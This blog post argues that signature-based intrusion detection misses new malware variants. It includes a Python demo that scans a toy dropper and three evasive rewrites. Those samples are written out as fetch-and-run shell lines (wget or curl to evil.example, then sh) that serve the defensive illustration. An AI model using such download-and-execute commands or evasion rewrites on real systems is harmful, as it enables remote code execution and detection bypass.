Signature Based IDPS is a weak defensive model
Don't get me wrong, signature based anti-virus / anti-malware has saved my ass numerous times, from countless well known and dangerous threats. But in today's environment that is not enough. As a computer security researcher, I chase vulnerabilities and monitor threats regularly, and lately I have noticed a growing number of 0-day threats (in layman's terms: new, unknown malware that nobody has a signature for yet) in the wild. Occasionally we even know the specific vulnerability they exploit, and still get compromised, because our signatures don't match the newly written attack scripts. The process itself is the weakness: a threat has to be discovered, analysed and listed before it can be detected, so the first victims of every new variant are by definition unprotected.

Therefore I will devote some coming time to investigating other IDPS approaches, in an attempt to find a better defensive solution. I will examine Network Intrusion Detection and Prevention Systems (NIDPS) and Host-based Intrusion Detection and Prevention Systems (HIDPS). The end result will be a 'best practice' solution, and a personal theoretical solution. Time to get to work...
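To make the gap concrete, here is an added Python example (written for this page, not code from the original post or from any real scanner). It builds a toy signature database from one constructed "dropper" script, an exact-file hash plus a byte pattern, then scans three rewrites of that script that do exactly the same thing. The sample, the signature names and the variants are all made up for illustration; the point is that every variant is a miss until someone collects it and ships an update.

```python
import hashlib
import re
from typing import Optional

# Constructed stand-in for a known malicious script (not a real sample).
KNOWN_SAMPLE = (
    b"#!/bin/sh\n"
    b"wget http://evil.example/p.sh -O /tmp/p.sh && sh /tmp/p.sh\n"
)

# A tiny signature database of the kind a signature-based scanner ships:
# an exact-file hash plus a byte pattern lifted from the known sample.
# Signature names are invented for the example.
SIGNATURES = {
    "hash": {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Dropper.Example.A"},
    "pattern": [
        (re.compile(rb"wget http://evil\.example/p\.sh -O /tmp/p\.sh"),
         "Dropper.Example.A"),
    ],
}


def scan(sample: bytes, sigs: dict = SIGNATURES) -> Optional[str]:
    """Signature match: exact hash first, then byte patterns.
    Returns the signature name on a hit, None on a miss.
    Nothing about what the sample *does* is examined."""
    digest = hashlib.sha256(sample).hexdigest()
    if digest in sigs["hash"]:
        return sigs["hash"][digest]
    for pattern, name in sigs["pattern"]:
        if pattern.search(sample):
            return name
    return None


# Three zero-cost rewrites of the same dropper (constructed). Each behaves
# exactly like the original; none shares its hash or byte pattern with it.
VARIANTS = {
    "extra whitespace": (
        b"#!/bin/sh\n"
        b"wget  http://evil.example/p.sh -O /tmp/p.sh && sh /tmp/p.sh\n"
    ),
    "variable indirection": (
        b"#!/bin/sh\n"
        b"u=http://evil.example/p.sh\n"
        b"wget \"$u\" -O /tmp/p.sh && sh /tmp/p.sh\n"
    ),
    "different tool": (
        b"#!/bin/sh\n"
        b"curl -o /tmp/p.sh http://evil.example/p.sh && sh /tmp/p.sh\n"
    ),
}


def scan_variants(sigs: dict = SIGNATURES) -> dict:
    """Scan every variant; returns {label: signature name or None}."""
    return {label: scan(sample, sigs) for label, sample in VARIANTS.items()}


def add_hash_signature(sigs: dict, sample: bytes, name: str) -> None:
    """The vendor's update step: the variant becomes 'known' only after it
    has been observed, collected and shipped. Until then it is invisible."""
    sigs["hash"][hashlib.sha256(sample).hexdigest()] = name


if __name__ == "__main__":
    print("known sample          :", scan(KNOWN_SAMPLE))
    for label, verdict in scan_variants().items():
        print(f"{label:22}:", verdict)
    # Ship an update for one variant; the other two stay undetected.
    add_hash_signature(SIGNATURES, VARIANTS["extra whitespace"], "Dropper.Example.B")
    print("after update:")
    for label, verdict in scan_variants().items():
        print(f"{label:22}:", verdict)
```

Running it shows the original sample flagged and all three variants passing clean; after the update only the variant that was "discovered" is caught, while the attacker can produce the next rewrite in seconds. Real scanners use fuzzier patterns than this, but the loop is the same: detection lags discovery, so a signature never covers the sample it has not seen yet.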